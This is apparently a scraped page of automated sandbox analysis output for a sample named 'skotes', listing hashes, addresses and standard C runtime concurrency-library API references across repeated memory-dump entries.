Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 60a62a3a49b282da89ac1dd2897a3c99486ae802d5a0ad6c1b2a4c9788d68423
Instruction ID: c6270729528ca1b2ad8c3c4ff163d7234a76102c8b4313f0c517105167486764
Opcode Fuzzy Hash: 60a62a3a49b282da89ac1dd2897a3c99486ae802d5a0ad6c1b2a4c9788d68423
Instruction Fuzzy Hash: 60313B75A00309EFCF14DF98C5C4BAE7BB9BB85310F1405AAD901AB357D734A946DBA0

Function 007B13F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 007B13FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 007B1447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 007B147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 007B152A

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 00c080d4b065ff35a9580724019f447fdd849732457af36b119d36f8504befd5
Instruction ID: 534e3dc43108eac10d61667a2a35758e8cf8828156f72feccc181224884dce9d
Opcode Fuzzy Hash: 00c080d4b065ff35a9580724019f447fdd849732457af36b119d36f8504befd5
Instruction Fuzzy Hash: 90317371A00605DFCF14EFA9C495AEDFBB1BF88710B94822DE516A7381DB38AD41CB90

Function 007A9C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 007A9C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 007A9CE8
std::bad_exception::bad_exception.LIBCMT ref: 007A9CFE
std::bad_exception::bad_exception.LIBCMT ref: 007A9D6A

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 3693af03a034423d530b55db05cf65240c9b1349eb46c072c9d980e6dd83b8a9
Instruction ID: b82d66ce5e88d9e355e992f5d9b6452bb51038dc514eb14957b6c4bb7a001adb
Opcode Fuzzy Hash: 3693af03a034423d530b55db05cf65240c9b1349eb46c072c9d980e6dd83b8a9
Instruction Fuzzy Hash: 6C21DA71A04514DFCF04EF64D88ADAEB7F0EF46310B20416AF202AF251DB39AE91CB61

Function 007A4885 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 007A4893
ListArray.LIBCONCRT ref: 007A48A5

Part of subcall function 007A5555: _InternalDeleteHelper.LIBCONCRT ref: 007A5564

ListArray.LIBCONCRT ref: 007A48AF
_InternalDeleteHelper.LIBCONCRT ref: 007A48C8

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: bf9f84604aa2d9fac5752413f1bb7ae713e2b544be21ff00c5d2b8ad062caed2
Instruction ID: f292e28a87ef94c17220f45e6acbb071067d54187dec0be19f65d3b0d916cd3b
Opcode Fuzzy Hash: bf9f84604aa2d9fac5752413f1bb7ae713e2b544be21ff00c5d2b8ad062caed2
Instruction Fuzzy Hash: D001D672600521EFCF25BB64E88AE6EB77ABFC67107000229F40457612DB6EEC2187A0

Function 007AEE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 007AEE6A
ListArray.LIBCONCRT ref: 007AEE7C

Part of subcall function 007AEF29: _InternalDeleteHelper.LIBCONCRT ref: 007AEF3B

ListArray.LIBCONCRT ref: 007AEE86
_InternalDeleteHelper.LIBCONCRT ref: 007AEE9F

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 78669545d6d8a1d65996b460383f90b9d1a6d4a096d4dd28b271d73ff66dd404
Instruction ID: 68a7dd16721090eda5d03032ec3dda28b7ea728f342b8cb016902567af2360a9
Opcode Fuzzy Hash: 78669545d6d8a1d65996b460383f90b9d1a6d4a096d4dd28b271d73ff66dd404
Instruction Fuzzy Hash: 0A01D672300521FFDE25BB61D8CAD6EBB79FFC67107000229F40457611CB28EC2186D0

Function 007AD0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 007AD0C5
ListArray.LIBCONCRT ref: 007AD0D7

Part of subcall function 007AC6B2: _InternalDeleteHelper.LIBCONCRT ref: 007AC6C4

ListArray.LIBCONCRT ref: 007AD0E1
_InternalDeleteHelper.LIBCONCRT ref: 007AD0FA

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: b04c49df2b26f16a9047fba8fd5daab8e9133e70554a6a0a3bf8f59b6d3533b6
Instruction ID: ed6f51ad0a812b1c8be9c492a73bbd1942741463286df9e0d9d27a851d3d0284
Opcode Fuzzy Hash: b04c49df2b26f16a9047fba8fd5daab8e9133e70554a6a0a3bf8f59b6d3533b6
Instruction Fuzzy Hash: 6501D672200521FFCE36BB60D9CAD6EB779BFCA710B01022AF40597A11DF28AC518690

Function 007B33C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007B33DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 007B33EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 007B3407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B341F

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
